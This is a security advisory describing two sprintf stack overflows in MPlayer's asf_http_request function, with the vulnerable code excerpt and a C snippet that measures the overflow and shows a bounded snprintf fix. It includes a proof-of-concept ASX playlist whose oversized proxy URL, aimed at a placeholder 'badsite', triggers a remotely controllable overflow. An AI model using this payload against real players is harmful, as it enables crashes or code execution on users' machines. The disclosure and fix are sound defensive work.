
Mplayer Buffer Overflow



Favorite Linux Player Buffer Overflow

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

The developers have been contacted and the problem has been fixed; updating
your MPlayer version is recommended.

 In the source tree there is a file called asf_streaming.c. This file has a
function named asf_http_request, and that function contains two buffer
overflows, both in its sprintf lines.

 asf_http_request {
        char str[250];                 /* fixed-size stack buffer */
        ....
        ...
        ..
        /* first overflow: the hostname length is never checked against str */
        sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
        ....
        ...
        ..
        /* second overflow: the same unbounded write with a second url */
        sprintf( str, "Host: %s:%d", url->hostname, url->port );
        ....
        ...
        ..
 }


 At first look this may seem not to be exploitable (because of the
MAXHOSTLEN size restriction), but with an ASX file like the one below, and a
"badsite" listening on "badport" that sends "\n\n" as its answer, you can
reach a fully controllable EIP buffer overflow.

 <asx version = "3.0">
 <title>Bad Site ASX</title>

 <moreinfo href = "mailto:info@badsite.com" />
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/" />
 </banner>

 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 </entry>
 </asx>

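The sprintf-into-str[250] pattern from asf_http_request, beside a bounded replacement, as an added example (my code, not MPlayer's): host_header_overflows() reports whether the original unbounded "Host: %s:%d" write would run past the 250-byte buffer for a given hostname and port, build_host_header() is the snprintf-based form that rejects anything that does not fit, and the *_for_len() helpers feed both a constructed all-'a' hostname like the one in the ASX above. With a two-digit port, 240 hostname characters still fit and 241 do not.

```c
#include <stdio.h>
#include <string.h>

#define STR_LEN 250   /* size of str[] in the vulnerable asf_http_request() */

/* Bytes the unbounded sprintf("Host: %s:%d") writes, NUL included;
 * nonzero means the original call runs past the 250-byte buffer. */
int host_header_overflows(const char *hostname, int port)
{
    return snprintf(NULL, 0, "Host: %s:%d", hostname, port) + 1 > STR_LEN;
}

/* Hardened form: bounded write that rejects, rather than silently
 * truncates, anything that does not fit. Returns 0 on success, -1 on error. */
int build_host_header(char *dst, size_t dstlen, const char *hostname, int port)
{
    int n;
    if (dst == NULL || dstlen == 0 || hostname == NULL)
        return -1;
    n = snprintf(dst, dstlen, "Host: %s:%d", hostname, port);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';            /* never leave a half-built header behind */
        return -1;
    }
    return 0;
}

/* Constructed input: a hostname of `len` 'a's, like the advisory's URL. */
static void make_host(char *host, size_t cap, size_t len)
{
    if (len >= cap) len = cap - 1;
    memset(host, 'a', len);
    host[len] = '\0';
}

/* Verdict of the original code for an all-'a' hostname of this length. */
int overflows_for_len(size_t len, int port)
{
    char host[512];
    make_host(host, sizeof host, len);
    return host_header_overflows(host, port);
}

/* Verdict of the bounded builder for the same input and a 250-byte str. */
int bounded_result_for_len(size_t len, int port)
{
    char host[512], str[STR_LEN];
    make_host(host, sizeof host, len);
    return build_host_header(str, sizeof str, host, port);
}
```

Call the two *_for_len() functions from a main() of your own (or a test) to see the 240/241 boundary for port 80.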


 Regards,

   Hernán Otero
   hernan.otero@eds.com
